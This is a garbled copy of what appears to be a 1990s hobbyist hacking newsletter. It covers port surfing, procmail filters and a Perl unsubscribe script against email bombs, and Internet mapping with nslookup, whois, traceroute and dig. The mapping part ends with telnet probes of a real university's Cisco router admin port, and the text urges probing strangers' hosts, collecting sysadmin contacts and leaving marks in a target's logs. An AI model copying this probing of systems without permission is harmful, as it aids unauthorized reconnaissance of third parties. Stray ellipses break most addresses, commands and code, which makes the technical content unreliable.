NM
...
179
...
222 ENSS365
...
ORG Up,Gateway,H 0 315 se0
1500
198
...
130
...
NM
...
224
...
33 ENSS365
...
ORG Up,Gateway,H 0 11362 se0
1500
203
...
132
...
NM
...
111
...
35 ENSS365
...
ORG Up,Gateway,H 0 1134 se0
1500
206
...
24
...
NM
...
212
...
106 ENSS365
...
ORG Up,Gateway,H 0 17
se0
1006
205
...
3
...
NM
...
49
...
242 ENSS365
...
ORG Up,Gateway,H 0 25
se0
1500
194
...
188
...
NM
...
64
...
NM
...
0
...
NM
...
66
...
NM
...
166
...
NM
...
134
...
NM
...
134
...
NM
...
132
...
121
...
1 Up,Gateway 0 6345 se0
1500
204
...
67
GLORY
...
ORG Up,Gateway 0 2022 se0
1500
206
...
67
GLORY
...
ORG Up,Gateway 0 7778 se0
1500
206
...
68
LAWRII
...
ORG Up,Gateway 0 3185 se0
1500
207
...
5
GLORY
...
ORG Up,Gateway 0 626 se0
1500
204
...
69
GLORY
...
ORG Up,Gateway 0 7990 se0
1500
207
...
6
GLORY
...
ORG Up,Gateway 0 53
se0
1500
204
...
70
LAWRII
...
ORG Up,Gateway 0 18011 se0
1500
192
...
135 GLORY
...
ORG Up,Gateway 0 5
se0
1500
206
...
71
LAWRII
...
ORG Up,Gateway 0 2
se0
1500
204
...
7
GLORY
...
ORG Up,Gateway 0 38
se0
1500
199
...
135
GLORY
...
ORG Up,Gateway 0 99
se0
1500
198
...
136
LAWRII
...
ORG Up,Gateway 0 1293 se0
1500
204
...
9
GLORY
...
ORG Up,Gateway 0 21
se0
1500
204
...
73
GLORY
...
ORG Up,Gateway 0 59794 se0
1500
129
...
0
GLORY
...
ORG Up,Gateway 0 5262 se0
1500
192
...
10
LAWRII
...
ORG Up,Gateway 0 163 se0
1500
206
...
75
LAWRII
...
ORG Up,Gateway 0 604 se0
1500
207
...
13
GLORY
...
ORG Up,Gateway 0 1184 se0
1500

204
...
77
207
...
14
204
...
78
204
...
207
204
...
79
192
...
144
206
...
80
204
...
80
198
...
209
207
...
17
204
...
82
192
...
211
192
...
147
204
...
84
204
...
87
146
...
0
192
...
24
204
...
88
198
...
217
192
...
89
198
...
219
206
...
92
192
...
220
204
...
92
198
...
157
206
...
93
204
...
93
198
...
158
198
...
159
204
...
95
206
...
96
206
...
161
198
...
97
198
...
161
192
...
226
198
...
99
198
...
163
192
...
100
204
...
100
128
...
0
198
...
165
206
...
165
206
...
102
160
...
0
206
...
166
205
...
231
198
...
167
206
...
103
198
...
168
206
...
104
206
...
168
204
...
105
206
...
105
204
...
41

LAWRII
...
ORG Up,Gateway 0 3649 se0
1500
GLORY
...
ORG Up,Gateway 0 334 se0
1500
GLORY
...
ORG Up,Gateway 0 239 se0
1500
GLORY
...
ORG Up,Gateway 0 293 se0
1500
GLORY
...
ORG Up,Gateway 0 1294 se0
1500
LAWRII
...
ORG Up,Gateway 0 117 se0
1500
PENNY
...
ORG Up,Gateway 0 4663 se0
1500
GLORY
...
ORG Up,Gateway 0 91
se0
1500
LAWRII
...
ORG Up,Gateway 0 1136 se0
1500
GLORY
...
ORG Up,Gateway 0 24173 se0
1500
GLORY
...
ORG Up,Gateway 0 29766 se0
1500
GLORY
...
ORG Up,Gateway 0 155 se0
1500
LAWRII
...
ORG Up,Gateway 0 3133 se0
1500
PENNY
...
ORG Up,Gateway 0 189 se0
1500
LAWRII
...
ORG Up,Gateway 0 94
se0
1500
GLORY
...
ORG Up,Gateway 0 140 se0
1500
GLORY
...
ORG Up,Gateway 0 3530 se0
1500
LAWRII
...
ORG Up,Gateway 0 136 se0
1500
GLORY
...
ORG Up,Gateway 0 303 se0
1500
GLORY
...
ORG Up,Gateway 0 3513 se0
1500
GLORY
...
ORG Up,Gateway 0 1278 se0
1500
LAWRII
...
ORG Up,Gateway 0 1228 se0
1500
129
...
1
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
206
...
134
...
206
...
49
...
59
...
29
...
206
...
134
...
206
...
175
...
59
...
51
...
136
...
134
...
175
...
206
...
206
...
59
...
59
...
206
...
206
...
206
...
206
...
206
...
120
...
206
...
167
...
206
...
121
...
134
...
134
...
123
...
134
...
134
...
206
...
206
...
134
...
206
...
69
...
206
...
134
...
206
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
NM
...
121
...
4)
AA:00:04:00:61:D0 Temporary
[UNKNOWN] (IP 129
...
251
...
NM
...
121
...
56)
08:00:87:04:9F:42 Temporary
CHAMA
...
ORG (IP 129
...
1
...
121
...
5)
LAWRII
...
ORG (IP 129
...
254
...
121
...
91)
BRAVO
...
ORG (IP 129
...
1
...
NM
...
121
...
10)
ARRIBA
...
ORG (IP 129
...
1
...
NM
...
121
...
51)
ENSS365
...
ORG (IP 129
...
1
...
NM
...
121
...
1)
[UNKNOWN] (IP 129
...
253
...
121
...
5)
CONCHAS
...
ORG (IP 129
...
1
...
121
...
10)

AA:00:04:00:D2:D0 Temporary
AA:00:04:00:5C:D0 Temporary
00:C0:05:01:2C:D2 Temporary
AA:00:04:00:0B:D0 Temporary
AA:00:04:00:5F:D0 Temporary
08:00:2B:BC:C1:A7 Temporary
08:00:87:00:A1:D3 Temporary
00:00:0C:51:EF:58 Temporary
08:00:5A:1D:52:0D Temporary
08:00:5A:47:4A:1D Temporary
00:C0:7B:5F:5F:80 Temporary
08:00:5A:47:4A:1D Temporary
AA:00:04:00:4B:D0 Temporary

MultiNet Network Interface statistics:
Name Mtu Network Address
Ipkts Ierrs Opkts Oerrs Collis
---- --- ------- -------------- ----- ----- ----- ----- -----se0 1500 129
...
0 GRANDE
...
ORG 68422948 0 53492833 1 0
lo0 4136 127
...
0 127
...
0
...

10 buffers allocated to Packet Headers
...

57 buffers allocated to Protocol Control Blocks
...

2 buffers allocated to Socket Names and Addresses
...

2 buffers allocated to Interface Addresses
...

1 buffer allocated to Timeout Callbacks
...

2 buffers allocated to Network TTY Control Blocks
...

11 CXBs borrowed from VMS device drivers

2 CXBs waiting to return to the VMS device drivers
162 Kbytes allocated to MultiNet buffers (44% in use)
...

Connection closed by foreign host
...

So from this we learned two things:
1) Grande
...
org is a very busy and important computer
...

So my lady friend wanted to try out another port
...
So she gave the
command:
[68] ->telnet grande
...
org 79
Trying 129
...
1
...

Connected to grande
...
org
...

finger
?Sorry, could not find "FINGER"
Connection closed by foreign host
...
nm
...
121
...
2
...
nm
...

Escape character is '^]'
...

[69] ->telnet grande
...
org 79
Trying 129
...
1
...

Connected to grande
...
org
...

?
?Sorry, could not find "?"
Connection closed by foreign host
...
nm
...
121
...
2
...
nm
...

Escape character is '^]'
...

[69] ->
At first this looks like just a bunch of failed commands
...
The reason is
that port 79 is, under IETF rules, supposed to run fingerd, the finger daemon
...
nm
...

Now on may computers they don’t run the finger daemon at all
...

But if finger is shut down, and nothing else is running on port 79, we woudl get the answer:
telnet: connect: Connection refused
...
nm
...

Now the normal thing a port surfer does when running an unfmiliar daemon is to coax it into revealing what
commands it uses
...
But it didn’t help us
...
If it were a daemon that was meant for anybody and his brother to use, it would have given us
instructions
...

But there was one hack we decided to do first: leave our mark on the shell log file
...
The adminsitrator of
an obviously important computer such as grande
...
org is probably competent enough to scan the records
of what commands are given by whom to his computer
...
So everything we types while connected was saved on a log
...
Oh, dear, I do believe
she’s hooked on hacking
...

So, port surf’s up! If you want to surf, here’s the basics:
1) Get logged on to a shell account
...
Or -run Linux or some other kind of Unix on your PC and hook up to the Internet
...

3) If you get the response “connected to ,” then surf’s up!
Following are some of my favorite ports
...
However, please note that if you do too
much port surfing from your shell account, your sysadmin may notice this in his or her shell log file
...
So you may want to explain in advance
that you are merely a harmless hacker looking to have a good time, er, um, learn about Unix
...

Port number Service Why it’s phun!
7 echo Whatever you type in, the host repeats back to
9 discard Dev/null -- how fast can you figure out this

you, used for ping
one?

11 systat Lots of info on users
13 daytime Time and date at computer’s location
15 netstat Tremendous info on networks but rarely used any
19 chargen Pours out a stream of ASCII characters
...


21 ftp Transfers files
22 ssh secure shell login -- encrypted tunnel
23 telnet Where you log in if you don’t use ssh:)
25 smpt Forge email from Bill
...
org
...
More than one service may also be assigned simultaneously to the same port
...
That means that an Internet
host may use other ports for these services
...


Contents of Volume 3:
How to protect yourself from email bombs!
How to map the Internet
...
3 Number 1
How to protect yourself from email bombs!
____________________________________ ____
Email bombs! People like angry johnny, AKA the “Unamailer,” have made the news lately by arranging for
20 MB or more of email -- tens of thousands of messages -- to flood every day into his victims’ email
accounts
...
One, the victim can’t easily find any of their legitimate
email in that giant garbage heap of spam
...

Of course, those are the two main reasons that email bombers make their attacks: to mess up people’s email
and/or harm the ISPs they target
...
It also is used by lusers with a grudge
...
But we aren’t
...
(Someone simultaneously attempted to email bomb the Happy
Hacker list itself but no one has stepped forward to take credit for the attempt)
...

Now most of these are techniques for use by experts only
...
Maybe then they’ll forgive you if your shell log file gets to looking a little too
exciting!
My first line of defense is to use several on-line services
...
, I can just email all my correspondents and tell them where to reach me
...
Or, an ISP may get a little too anxious over your hacking experiments
...

But that’s a pretty chicken way to handle email bombing
...
But even if johnny had bombed all my favorite
accounts, I could have been back on my feet in a hurry
...

The simplest defense is for your ISP to block mail bombs at the router
...
It also only works if your ISP agrees to help you out
...

***************************
Newbie note: routers are specialized computers that direct traffic
...

***************************
But what if the attack comes from many places on the Internet? That happened to me on Christmas day
when angry johnny took credit for an email bombing attack that also hit a number of well-known US figures
such as evangelist Billy Graham, President Bill Clinton and Speaker of the US House of Representatives
Newt Gingrich
...
)
The way angry johnny worked this attack was to set up a program that would go to one computer that runs
a program to handle email lists and automatically subscribe his targets to all lists handled by that computer
...

I was able to fix my problem within a few minutes of discovery
...
com
...
com, to receive email
...
So all I had
to do was go to the Highway Technologies Web site and configure my mail server to pipe email to another
account
...
It is the one to which you hook your personal
computer when you give it a command to upload or download your email
...
forward
...

***********************
If angry johnny had email bombed cmeinel@techbroker
...
com, etc
...
And my swcp
...
That ISP, Southwest Cyberport, offers
each user several accounts all for the same price, which is based on total usage
...

Warning -- this technique -- every technique we cover here -- will still cause you to lose some email
...
No mail daemon warning that the message failed, nothing
...
So if you are counting on getting every piece of email that people send you, dream
on
...
They still have to deal with the bandwidth problem of all that crud
flooding in
...
One of the sysadmins at Southwest Cyberport told me that almost every

day some luser email bombs one of their customers
...
So essentially every ISP somehow has
to handle the email bomb problem
...
net>
Subject: Question
Carolyn:
First, and perhaps most important, when I called you to check if you had indeed been email bombed, you
were courteous enough to respond with information
...
" This was a story that was, in
fact, exclusive
...
But since Koch
tells me he was in contact with angry johnny in the weeks leading up to the mass email bombings of
Christmas 1996, he clearly knew a great deal more than I about the list of johnny’s targets
...
)
Second, yes I am a subscriber and I am interested in the ideas you advance
...
" The details of any story lay
in the
writing and commentary I offer the public
...

(Carolyn’s note: If you wish to see what Koch wrote on angry johnny, you may see it in the Happy Hacker
Digest of Dec
...
)
The fact is I am extraordinarily surprised by some of the reactions I have received from individuals, some of
whom were targets, others who are bystanders
...
at the peril of us all
...
Fry in dev/null, email bomber!"
johnny made the point several times that the attack was "simple
...

I imagine -- I know -- that if he, or other hackers had chosen to do damage, serious, real damage, they could
easily do so
...

One person who was attacked and was angry with my report
...

This kind of thinking ignores history and reality
...
or look to what has happened in Ireland or Israel
...
"

What happened was an inconvenience --equivalent, in my estimation, to the same kind of inconvenience
people experienced when young people blocked the streets of major cities in protest against the war in
Vietnam
...
Hundreds of
thousands
of people lost their lives in that war -- and if some people found themselves inconvenienced by people
protesting against it -- I say, too d*** bad
...
I’m flattered, I guess
...

what are some more ways to fight email bombs?
For bombings using email lists, one approach is to run a program that sorts through the initial flood of the
email bomb for those “Welcome to the Tomato Twaddler List!” messages which tell how to unsubscribe
...

Another way your ISP can help you is to provide a program called Procmail (which runs on the Unix
operating system
...
com) has provided the following article
...
cis
...
edu/hypertext/faq/usenet/mail/filteringfaq/faq
...
This is one of the best filtering-mail FAQs out there, and if you have any problems with my
directions or want to learn more about filtering mail, this is where you should look
...
Worse, there is
the email bomb
...
This is when an attacker sends you hundreds, or perhaps even thousands of pieces
of email, usually by means of a script and fakemail
...

2) Mailing List bombs
...

This is much worse than a massmail because you will be getting email from many different mailing lists, and
will have to save some of it so that you can figure out how to unsubscribe from each list
...
Procmail (pronounced prok-mail) is a email filtering program that can do
some very neat things with your mail, like for example, if you subscribe to several high-volume mailing lists,

it can be set up to sort the mail into different folders so that all the messages aren't all mixed up in your
Inbox
...


Setting up Procmail
------------------First, you need to see if your system has Procmail installed
...
Write this down
- you will need it later
...

If you still cannot find Procmail, then it is probably a good bet that your system does not have it installed
...

Next, you have to set up a resource file for Procmail
...

You may use whichever editor you feel comfortable with
...

> cd
> pico
...
procmailrc file:
# This line tells Procmail what to put in its log file
...

VERBOSE=off
# Replace 'mail' with your mail directory
...
procmail
LOGFILE=$PMDIR/log
# INCLUDERC=$PMDIR/rc
...

> cd
> mkdir
...
ebomb:

IMPORTANT: Be sure that you turn off your editor's word wrapping during this part
...
With Pico, use the -w flag
...
Make sure that when
you edit it, you leave NO SPACES in that line
...
procmail
> pico -w rc
...
%@a-z0-9])?
(Post(ma?(st(e?r)?|n)|office)|Mail(er)?|daemon|mmdf|root|uucp|LISTSERV|owner
|request|bounce|serv(ices?|er))([^
...
*(postmaster|Mailer|listproc|ma jordomo|listserv|cmeinel|johnb)
* ! ^TO(netstuff|computing|pcgames)
/dev/null
Lets see what these do
...
A recipe it
basically what it sounds like -- it tells the program what it should look for in each email message, and if it
finds what it is looking for, it performs an action on the message
- forwarding it to someone; putting it in a certain folder; or in this case, deleting it
...
The asterisk (*)
tells Procmail that this is the beginning of a condition
...

Condition 1:
* ! ^((((Resent-)?(From|Sender)|X-Envelope-From):|From )(
...
!:a-z0-9]|$)))
Don't freak out over this, it is simpler than it seems at first glance
...
If
a message IS
from one of those addresses, the recipe will put the message into your inbox and not delete it
...
Well,
it looked like a good idea at first, but I just found out a few days ago that FROM_MAILER also checks the
Precedence: header for the words junk, bulk, and list
...

Condition 2:
* ! ^From:
...
In this example, it checks for the
words listproc, majordomo, cmeinel, and johnb
...
If not, it's a goner
...
When editing this line, remember to: only put the username in the condition, not a persons full
email address, and remember to put a | between each name
...
For example, I am subscribed to the netnews, crypto-stuff, and pcgames lists
...
This line will check for those usernames and pass
them through to your Inbox if they match
...

The final line, /dev/null, is essentially the trash can of your system
...
e
...

Ok
...
procmailrc and rc
...
We need one more before
everything will work properly
...
noebomb and exit your editor, and go to your home directory
...

> cd
> pico -w
...
's Mail Filtering FAQ:
Enter a modified version of the following in your ~/
...

* The vertical bar (|) is a pipe
...

* Replace `nancym' with your userid
...
forward so that it will be
different than anyother
...

* Do NOT use ~ or environment variables, like $HOME, in your
...
If procmail resides below
your home directory write out the *full* path
...
forward world
readable and your home directory world searchable in order for the mail transport agent to "see" it
...
forward
chmod a+x
...
forward template above doesn't work the following alternatives might be helpful:
In a perfect world:
"|exec /usr/local/bin/procmail #nancym"
In an almost perfect world:

"|exec /usr/local/bin/procmail USER=nancym"
In another world:
"|IFS=' ';exec /usr/local/bin/procmail #nancym"
In a different world:
"|IFS=' ';exec /usr/local/bin/procmail USER=nancym"
In a smrsh world:
"|/usr/local/bin/procmail #nancym"

Now that you have all the necessary files made, it's time to test this filter
...
This procedure differs from program to program, so you may have to
experiment a little
...
noebomb file and change /dev/null to Ebombtest
...
procmailrc
and remove the # from the last line
...
Ask some of the people in Condition 2 to send you some
test messages
...
Send
yourself some fake email under a different name and check to see if it
ends up in the Ebombtest folder
...
com to make sure
that Condition 1 works
...

If all of these test out fine, then congratulations! You now have a working defense against email bombs
...
noebomb file back to /dev/null, and put the # in front of
the INCLUDERC line in the
...
If someone ever decides to emailbomb you, you only need to
remove the #, and you will have greatly cut down on the amount of messages coming into your Inbox,
giving you a little bit of breathing room to start unsubscribing to all those lists, or start tracking down those
idiots who did it and get their
asses kicked off their ISP's
...
com
...
Therefore, I assume no responsibility for any email which
may get lost, and any damages which may come from those lost messages
...
informatik
...
de/pub/packages/procmail/
*******************
A note of thanks goes to Damien Sorder (jericho@dimensional
...

And now, just to make certain you can get this invaluable Perl script to automatically unsubscribe email
lists, here is the listing:
#!/usr/local/bin/perl
# unsubscribe
#
# A perl script by Kim Holburn, University of Canberra 1996
...
edu
...
If you make any useful adjustments or
# additions send them back to me
...
It also mails them that it has done this
...

# This script must be run by root although I don't check for this
...

#
# This script when applied to a mailbox will look through it to find
# any emails sent by mailing lists, attempt to determine the address of the
# mailing list and then send an unsubscribe message from that user
...

#
# Technical details:
# To find emails from mailing lists it looks for "owner" as part of
# the originating email address in the BSD From line (envelope)
...

# The script doesn't do any file locking but then it only reads the mailbox
# file
...
*$//;
$user =~ s/@
...
*@//;
if ($address !~ /@/) { &fail_usage("bad address"); }
&unsub ($user, $list, $host, $address);
¬ify ($user, $list, $host, $address);
exit;
} else { &fail_usage("no files and no addresses"); }
}
if ($usersupplied && $#ARGV > 0) { &fail_usage(); }

foreach $file (@ARGV) {
%addresses=();
if (!$usersupplied) { $user=$file; }
$user =~ s@^
...
/) { print "skipping wrong type of file \"$file\"\n"; next; }
if ($file =~ /\
...
/) { print "skipping wrong type of file \"$file\"\n"; next; }
$user =~ s/^\
...
*$//;
if (!open (MYFILE, "<$file" ))
{ print "Couldn't open file \"$file \"\n"; next; }
print "--------------------------opening file \"$file\"\n";
while () {
# if (/(\bnews-[-\w
...
]+-news@)/i)
# if (/(\brequest-[-\w
...
]+-request@)/i)
if (/(\bowner-[-\w
...
]+-owner@)/i) {
chop;
tr/A-Z/a-z/;
if (/\bowner-[-\w
...
*\bowner-([-\w
...
]+)\b
...
*[^-\w
...
]+)-owner(@[\w
...
*$/\2\3/; }
if (/[^a-z0-9@
...
]+@)|([-\w
...
]+@/) { s/^
...
]+@[\w
...
*$/ \1/; }
else { s/(^|^
...
])([-\w
...
]+)\b
...
-]/) { next; }
if (!defined ($addresses{$_})) { $addresses{$_}=""; }
}
}
close MYFILE;
while (($key,$value)=each %addresses) { print "$key\n"; }
if (! keys %addresses ) { print "no listservers\n"; next; }
if (! open (MYFILE, "<$file" ))
{ print "Couldn't open file \"$file\"\n"; next; }
print "looking for listserver addresses\n";
while () {
foreach $address (keys %addresses) {
$host=$address;
$host =~ s/^
...
*@//;
$list=$key;

$list=~s/@
...
3 Number 2
How to map the Internet
...

____________________________________________________________
Why map the Internet?
* Because it’s fun -- like exploring unknown continents
...

* Because when you can’t make contact with someone in a distant place, you can help your ISP trouble
shoot broken links in the Internet
...

How will your ISP know that their communications provider is lying down on the job unless someone
advises them of trouble?
* Because if you want to be a computer criminal, your map of the connections to your intended victim gives
you valuable information
...
We’re
just going to explore some of the best tools available for mapping the uncharted realms of the Internet
...
But to take full advantage of this
lesson, you should either have some sort of Unix on your personal computer, or a shell account! SHELL
ACCOUNT! If you don’t have one, you may find an ISP that will give you a shell account at
http://www
...
com/pocia/
...
The “shell” is the program that translates your keystrokes into Unix commands
...
Ask tech support at your
ISP for a shell account set up to use bash
...
If your ISP doesn’t offer shell accounts, get a new ISP that does offer it
...

****************************
So for our mapping expedition, let’s start by visiting the Internet in Botswana! Wow, is Botswana even on
the Internet? It’s a lovely landlocked nation in the southern region of Africa, famous for cattle ranching,
diamonds and abundant wildlife
...

Our first step in learning about Botswana’s Internet hosts is to use the Unix program nslookup
...
We can hardly do
it justice here
...

***************************
The first step may be to find where your ISP has hidden the program by using the command “whereis
nslookup
...
) Aha -- there it is! I give the command:
->/usr/etc/nslookup
Default Server: swcp
...
59
...
2
>
These two lines and the slightly different prompt (it isn’t an arrow any more) tell me that my local ISP is
running this program for me
...
) Now we are in
the program, so I have to remember that my bash commands don’t work any more
...

> set type=ns
Next we need to know the domain name for Botswana
...
For Botswana it’s bw
...

Server: swcp
...
59
...
2
Non-authoritative answer:
This “non-authoritative answer” stuff tells me that this information has been stored for awhile, so it is
possible, but unlikely, that the information below has changed
...
EE
...
AC
...
PSG
...
UU
...
RU
...
ZA
Authoritative answers can be found from:
DAISY
...
UND
...
ZA
inet address = 146
...
192
...
PSG
...
28
...
34
NS
...
NET
inet address = 137
...
1
...
RU
...
ZA inet address = 146
...
128
...
This tells me that the Internet is in
its infancy in Botswana -- no nameservers there -- but must be well along in South Africa
...
The
Domain Name System makes sure that no two computers have the same name
...
When various nameservers get to talking with each other, they eventually,
usually within seconds, can figure out the routes to any one of the millions of computers on the Internet
...
Let’s learn more about South Africa
...

Server: swcp
...
59
...
2
Non-authoritative answer:
za nameserver = DAISY
...
UND
...
za
za nameserver = UCTHPX
...
AC
...
RU
...
za
za nameserver = RAIN
...
COM
za nameserver = MUNNARI
...
AU
za nameserver = NS
...
NET
za nameserver = NS
...
NET
za nameserver = UUCP-GW-1
...
DEC
...
FRD
...
za
Authoritative answers can be found from:
DAISY
...
UND
...
za
inet address = 146
...
192
...
UCT
...
za
inet address = 137
...
128
...
RU
...
za inet address = 146
...
128
...
PSG
...
28
...
34
MUNNARI
...
AU inet address = 128
...
22
...
OZ
...
250
...
21
NS
...
NET
inet address = 192
...
202
...
PA
...
COM inet address = 204
...
2
...
PA
...
COM inet address = 16
...
0
...
FRD
...
za inet address = 137
...
80
...
214
...
1 supposed to mean? That’s the name of a computer on the
Internet (inet) -- in this case APIES
...
AC -- in octal
...
All computer names on the Internet must be changed into numbers so that other computers
can understand them
...
We see computers in Australia (au) and
the US (com domain)
...
That’s made by holding

down the control key while hitting the small “d” key
...

Next, we take one of the nameservers in South Africa and ask:
->whois HIPPO
...
AC
...
RU
...
ZA
Address: 146
...
128
...

To see this host record with registered users, repeat the command with a star ('*') before the name; or, use
'%' to show JUST the registered users
...

Please use the whois server at nic
...
mil for MILNET Information
...

Now, just for variety, I use the whois command with the numerical address of one of the nameservers
...
And, voila, we get:
->whois 146
...
192
...
EE
...
AC
...
230
...
18
System: HP-9000 running HP-UX
Domain Server
Record last updated on 14-Sep-94
...
Now how about
directly mapping a route from my computer to South Africa? For that we will use the traceroute command
...
It should be used primarily for manual fault isolation, like the time I couldn’t email my friend in
Northern Ireland
...
Use it too much
and your ISP may start asking you some sharp questions
...
Don’t use it
...
pcworld
...
html) about how a three-year-old could run the
attack
...

************************
I give the command:
->whereis traceroute
traceroute: /usr/local/bin/traceroute
OK, now we’re ready to map in earnest
...
EE
...
AC
...
EE
...
AC
...
230
...
18), 30 hops max, 40 byte packets
1 sisko (198
...
115
...
nm
...
net (204
...
78
...
NM
...
121
...
3) 5 ms 10 ms 7 ms
4 h4-0
...
Albuquerque
...
ans
...
103
...
45) 17 ms 41 ms 28 ms
5 f2
...
Albuquerque
...
ans
...
222
...
221) 7 ms 6 ms 5 ms
6 h14
...
Los-Angeles
...
ans
...
223
...
9) 31 ms 39 ms 84 ms
7 h14
...
San-Francisco
...
ans
...
223
...
13) 67 ms 43 ms 68 ms
8 enss220
...
ans
...
223
...
22) 73 ms 58 ms 54 ms
9 sl-mae-w-F0/0
...
net (198
...
136
...
sprintlink
...
228
...
109) 313 ms 479 ms 473 ms
11 sl-stk-2-F/T
...
net (198
...
6
...
sprintlink
...
228
...
106) 164 ms * 176 ms
13 sl-dc-7-F/T
...
net (198
...
0
...
gsl
...
59
...
197) 135 ms 152 ms 130 ms
15 204
...
225
...
59
...
66) 583 ms 545 ms 565 ms
16 * * *
17 e0
...
uni
...
za (155
...
249
...
und00
...
net
...
232
...
1) 424 ms 485 ms 492 ms
19 e0
...
uni
...
za (155
...
190
...
und02
...
net
...
232
...
2) 650 ms * 548 ms
21 Gw-Uninet1
...
und
...
za (146
...
196
...
und
...
za (146
...
128
...
ee
...
ac
...
230
...
18) 573 ms 585 ms 493 ms
So what does all this stuff mean?
The number in front of each line is the number of hops since leaving the computer that has the shell account
I am using
...

The numbers after that are the time in milliseconds it takes for each of three probe packets in a row to make
that hop
...
In the case of this traceroute command, any
time greater than 3 seconds causes an * to be printed out
...
That silent gateway may be the result of a bug in the 4
...
2 or 4
...
A computer running one of these operating systems sends an
“unreachable” me ssage
...
Sorry, I’m not enough of a genius yet to figure out
this one for sure
...
Especially the Sun OS manual
...
Here’s how it works:
1
...
For example, if you use Compuserve o r AOL, make a connection, then minimize
your on-line access program
...
Click on the Start menu
...
Open a DOS window
...
At the DOS prompt type in “tracert ...
com> where “distant
...
com” is replaced by
the name of the computer to which you want to trace a route
...

5
...
Especially if your are tracing a route to a distant computer, it takes awhile to make all the
connections
...
That’s why it sometimes take a long while for your browser to start
downloading a Web page
...
If you decide to use Windows for this hacking lesson, Damien Sorder has a message for us: “DON'T
ENCOURAGE THEM TO USE WIN95!@#$!@#!” He’s right, but since most of you reading this are
consenting adults, I figure it’s your funeral if you stoop to Windows hacking on an AOL PPP connection!
***********************
Now this is getting interesting
...
und
...
za
...
und
...
za, OK?
First, we can guess from the name that is it a Cisco router
...
Since 85% of the routers in the world are Ciscos,
that’s a pretty safe bet
...
und
...
za is a Cisco
...

First we try out whois:
->whois cisco-unp
...
ac
...
UND
...
ZA"
...

Please use the whois server at nic
...
mil for MILNET Information
...
und
...
za exists, but whois can’t find it! Actually this is a common
problem, especially trying to use whois on distant computers
...
” It does a lot of the same things as nslookup
...
For details on dig, use the
command from your shell account “man dig
...
UND
...
ZA
; <<>> DiG 2
...
UND
...
ZA
;; res options: init recurs defnam dnsrch
;; got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6
;; flags: qr aa rd ra; Ques: 1, Ans: 4, Auth: 5, Addit: 5
;; QUESTIONS:
;; CISCO-UNP
...
AC
...
UND
...
ZA
...
UND
...
ZA
...
UND
...
ZA
...
UND
...
ZA
...
230
...
1
146
...
12
...
230
...
1
146
...
128
...
ac
...
86400 NS Eagle
...
ac
...

und
...
za
...
und
...
za
...
ac
...
86400 NS ucthpx
...
ac
...

und
...
za
...
ru
...
za
...
ac
...
86400 NS Rain
...
com
...
und
...
za
...
230
...
15
Shrike
...
ac
...

86400 A
146
...
128
...
uct
...
za
...
158
...
1
hiPPo
...
ac
...
86400 A
146
...
128
...
psg
...
14400 A
147
...
0
...
59
...
2
;; WHEN: Fri Jan 17 13:03:49 1997
;; MSG SIZE sent: 37 rcvd: 305
Ahhh, nice
...
The line “Ques: 1, Ans: 4, Auth: 5, Addit: 5” tells us how many items
we’ll get under each topic of questions, answers, authority records, and additional records
...
) This “records” stuff refers to information stored under
the domain name system
...
UND
...
ZA is a domain name within the
Internet
...
The first really *new* thing we learn is that four routers all share the
same domain name
...
The reverse can
also happen: several domain names can all belong to the same numerical address
...
EE
...
AC
...
As hackers, we want to get wise to all these variations in
how domain names are associated with boxes
...
UND
...
ZA
...
com
Address: 198
...
115
...
This is a command that comes in really, really handy when
we’re playing vigilante and need to persecute a spammer or bust a child porn Web site or two
...

> set type=soa
Then I enter the name of the computer about which I am curious
...
It often helps to do this with nslookup:
> CISCO-UNP
...
AC
...

Server: swcp
...
59
...
2
*** No start of authority zone information is available for CISCO-UNP
...
AC
...

Now what do I do? Give up? No, I’m a hacker wannabe, right? So I try entering just part of the domain name,
again remembering to put a period at the end:
> und
...
za
...
com
Address: 198
...
115
...
ac
...
und
...
za
mail addr = postmaster
...
ac
...
und
...
za inet address = 146
...
128
...
und
...
za
inet address = 146
...
128
...
uct
...
za
inet address = 137
...
128
...
ru
...
za inet address = 146
...
128
...
psg
...
28
...
34
Bingo!!! I got the email address of a sysadmin whose domain includes that Cisco router, AND the IP
addresses of some other boxes he or she administers
...

But we aren’t done yet with cisco-unp
...
ac
...
230
...
8)
...
But why stop with a mere guess when we can port surf? So we fall back on our friend the
telnet program and head for port 2001:

->telnet 146
...
128
...
230
...
8
...
230
...
8
...

C
****************************************************
*** Welcome to the University of Natal
***
***
***
*** Model : Cisco 4500 with ATM and 8 BRI ports
***
***
***
*** Dimension Data Durban - 031-838333
***
***
***
***************************************************
Hey, we know now that this is a Cisco model 4500 owned by the University of Natal, and we even got a
phone number for the sysadmin
...

But why did I telnet to port 2001? It’s in common use among routers as the administrative port
...
You can
find a copy of this RFC at http://ds2
...
net/rfc/rfc1700
...
Read it and you’ll be in for some happy port
surfing!
************************
Evil Genius tip: there are a bunch of ports used by Cisco routers:
cisco-fna
130/tcp cisco FNATIVE
cisco-tna
131/tcp cisco TNATIVE
cisco-sys
132/tcp cisco SYSMAINT
licensedaemon 1986/tcp cisco license management
tr-rsrb-p1 1987/tcp cisco RSRB Priority 1 port
tr-rsrb-p2 1988/tcp cisco RSRB Priority 2 port
tr-rsrb-p3 1989/tcp cisco RSRB Priority 3 port
stun-p1
1990/tcp cisco STUN Priority 1 port
stun-p2
1991/tcp cisco STUN Priority 2 port
stun-p3
1992/tcp cisco STUN Priority 3 port
snmp -tcp-port 1993/tcp cisco SNMP TCP port
stun-port
1994/tcp cisco serial tunnel port
perf-port
1995/tcp cisco perf port
tr-rsrb-port 1996/tcp cisco Remote SRB port
gdp-port
1997/tcp cisco Gateway Discovery Protocol
x25-svc-port 1998/tcp cisco X
...
230
...
8
Trying 146
...
128
...

Connected to 146
...
128
...

Escape character is '^]'
...
If I were the sysadmin, I’d make it a little
harder to log in
...
230
...
8 79
Trying 146
...
128
...

Connected to 146
...
128
...

Escape character is '^]'
...
swcp
...

